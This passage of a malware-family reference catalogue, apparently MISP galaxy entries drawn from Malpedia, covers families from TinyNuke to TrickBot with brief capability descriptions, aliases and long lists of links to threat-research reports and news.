TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including a HiddenDesktop/VNC server and a reverse SOCKS4 server. It was for sale on underground marketplaces for $2500 in 2016. The program’s author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on GitHub. XBot is an offspring of TinyNuke, but very similar to its ancestor.

The tag is: misp-galaxy:malpedia="TinyNuke"

TinyNuke is also known as:

  • MicroBankingTrojan

  • Nuclear Bot

  • NukeBot

  • Xbot

Table 4774. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke

https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/

https://krebsonsecurity.com/tag/nuclear-bot/

https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet

https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/

https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/

https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html

https://asec.ahnlab.com/en/27346/

https://asec.ahnlab.com/en/32781/

https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702

TinyTurla

Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second-chance backdoor.

The tag is: misp-galaxy:malpedia="TinyTurla"

TinyTurla is also known as:

Table 4777. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla

https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/

https://infosec.exchange/@SophosXOps/111109357153515214

https://blog.talosintelligence.com/2021/09/tinyturla.html

Tiop

The tag is: misp-galaxy:malpedia="Tiop"

Tiop is also known as:

Table 4778. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop

TitanStealer

The stealer is written in Go and capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files.

The tag is: misp-galaxy:malpedia="TitanStealer"

TitanStealer is also known as:

Table 4779. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer

https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219

https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html

https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign

https://github.com/D4NTESCODE/TitanStealerSource

Tofsee

According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.

Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.

The tag is: misp-galaxy:malpedia="Tofsee"

Tofsee is also known as:

  • Gheg

Table 4781. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee

https://www.cert.pl/en/news/single/tofsee-en/

https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/

https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/

https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf

https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897.asp

https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/

https://blog.talosintelligence.com/tofsee-spam/

https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://intel471.com/blog/privateloader-malware

https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet

https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/

https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining

TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.

The tag is: misp-galaxy:malpedia="TONEDEAF"

TONEDEAF is also known as:

Table 4784. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf

https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

Topinambour

The tag is: misp-galaxy:malpedia="Topinambour"

Topinambour is also known as:

Table 4787. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.topinambour

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Torisma

Torisma is a complex HTTP(S) downloader that can serve as an orchestrator handling the execution of additional payloads from the C&C server.

It uses VEST-32 for encryption and decryption of network traffic between the client and the server.

Typically, it uses these parameter names for its HTTP POST requests: ACTION, CODE, CACHE, REQUEST, RES. It sends the victim’s MAC address in the initial request.

The response of the server informing the client about a successful authentication is "Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}". The client then requests additional data from the server, which decrypts to shellcode and its data parameters and is executed. The client also creates a named pipe, \\.\pipe\fb4d1181bb09b484d058768598b, that allows inter-process communication with the executed shellcode.

Torisma was usually downloaded by NedDnLoader, and deployed in the Operation DreamJob campaigns starting around Q4 2019.

The tag is: misp-galaxy:malpedia="Torisma"

Torisma is also known as:

Table 4788. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma

http://blog.nsfocus.net/stumbzarus-apt-lazarus/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html

https://www.telsy.com/lazarus-gate/

TorLoader

Downloader, delivered via a lure with fake exploits published on Github.

The tag is: misp-galaxy:malpedia="TorLoader"

TorLoader is also known as:

Table 4790. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader

https://vulncheck.com/blog/fake-repos-deliver-malicious-implant

TOUCHSHIFT

The tag is: misp-galaxy:malpedia="TOUCHSHIFT"

TOUCHSHIFT is also known as:

Table 4792. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.touchshift

https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970

ToxicEye

ToxicEye is a ransomware that spreads through phishing emails. The malware encrypts system files with AES-256 and demands a ransom in Bitcoin.

The tag is: misp-galaxy:malpedia="ToxicEye"

ToxicEye is also known as:

Table 4793. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye

https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/

https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/

TransBox

According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako.

The tag is: misp-galaxy:malpedia="TransBox"

TransBox is also known as:

Table 4794. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox

https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

TrickBot

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. It has multiple modules, including VNC and a SOCKS5 proxy, and uses SSL for C2 communication.

  • Q4 2016 - Detected in the wild in Oct 2016; first report in 2017. TrickBot primarily uses Necurs as the vehicle for installs.

  • Jan 2018 - Uses the XMRIG (Monero) miner.

  • Feb 2018 - Bitcoin theft.

  • Mar 2018 - Unfinished ransomware module.

  • Q3/4 2018 - TrickBot starts being spread through Emotet.

Infection vectors:

  1. Phish > Link to MS Office document > Macro enabled > Downloader > TrickBot

  2. Phish > Attached MS Office document > Macro enabled > Downloader > TrickBot

  3. Phish > Attached MS Office document > Macro enabled > TrickBot installed

The tag is: misp-galaxy:malpedia="TrickBot"

TrickBot is also known as:

  • TheTrick

  • TrickLoader

  • Trickster

Table 4797. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html

https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module

https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor

https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/

https://twitter.com/anthomsec/status/1321865315513520128

https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms

https://www.wired.co.uk/article/trickbot-malware-group-internal-messages

https://therecord.media/russian-trickbot-malware-developer-pleads-guilty

https://www.youtube.com/watch?v=EyDiIAtdI

https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware

http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html

https://www.netscout.com/blog/asert/dropping-anchor

https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features

https://redcanary.com/resources/webinars/deep-dive-process-injection/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/

https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://twitter.com/VK_Intel/status/1328578336021483522

https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf

https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/

https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns

https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/

https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/

https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked

https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/

https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/

https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/

https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html

https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/

https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization

https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf

https://www.youtube.com/watch?v=KMcSAlS9zGE

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573

https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/

https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/

https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf

https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html

https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/

https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/

https://www.nisos.com/research/trickbot-trickleaks-data-analysis/

https://www.youtube.com/watch?v=lTywPmZEU1A

https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/

https://blog.cyberint.com/ryuk-crypto-ransomware

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/

https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html

https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html

https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/

https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/

https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure

https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/

https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal

https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/

https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles

https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6

https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/

https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/

https://blog.lumen.com/a-look-inside-the-trickbot-botnet/

https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://labs.vipre.com/trickbots-tricks/

https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/

https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/

https://cofenselabs.com/all-you-need-is-text-second-wave/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption

https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/

https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/

https://www.ic3.gov/Media/News/2022/220120.pdf

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf

https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/

https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/

http://www.secureworks.com/research/threat-profiles/gold-blackburn

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf

https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf

https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/

https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/

https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/

https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/

https://www.youtube.com/watch?v=Brx4cygfmg8

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://www.joesecurity.org/blog/498839998833561473

http://www.malware-traffic-analysis.net/2018/02/01/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/

https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html

https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez

https://www.intrinsec.com/deobfuscating-hunting-ostap/

https://intel471.com/blog/a-brief-history-of-ta505

https://duo.com/decipher/trickbot-up-to-its-old-tricks

https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/

https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/

https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/

https://arcticwolf.com/resources/blog/karakurt-web

https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity

https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/

https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://home.treasury.gov/news/press-releases/jy1256

https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/

https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://www.youtube.com/watch?v=EdchPEHnohw

https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/

https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot

https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/

https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/

https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/

https://www.wired.com/story/trickbot-malware-group-internal-messages/

https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737

https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/

https://community.riskiq.com/article/111d6005/description

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/

https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html

https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html

https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis

https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html

https://osint.fans/service-nsw-russia-association

https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://intel471.com/blog/conti-leaks-ransomware-development

https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/

https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/

https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607

https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://blog.talosintelligence.com/2020/03/trickbot-primer.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.splunk.com/en_us/blog/security/detecting-trickbots.html

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/

https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html

https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/

https://www.justice.gov/opa/press-release/file/1445241/download

https://community.riskiq.com/article/04ec92f4

https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes

https://www.mandiant.com/media/12596/download

https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/

https://www.secdata.com/the-trickbot-and-mikrotik/

https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/

https://community.riskiq.com/article/298c9fc9

https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html

http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/

https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/

https://www.secureworks.com/research/threat-profiles/gold-blackburn

https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/

https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows

https://share.vx-underground.org/Conti/

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

https://us-cert.cisa.gov/ncas/alerts/aa21-076a

http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.secureworks.com/research/threat-profiles/gold-ulrick

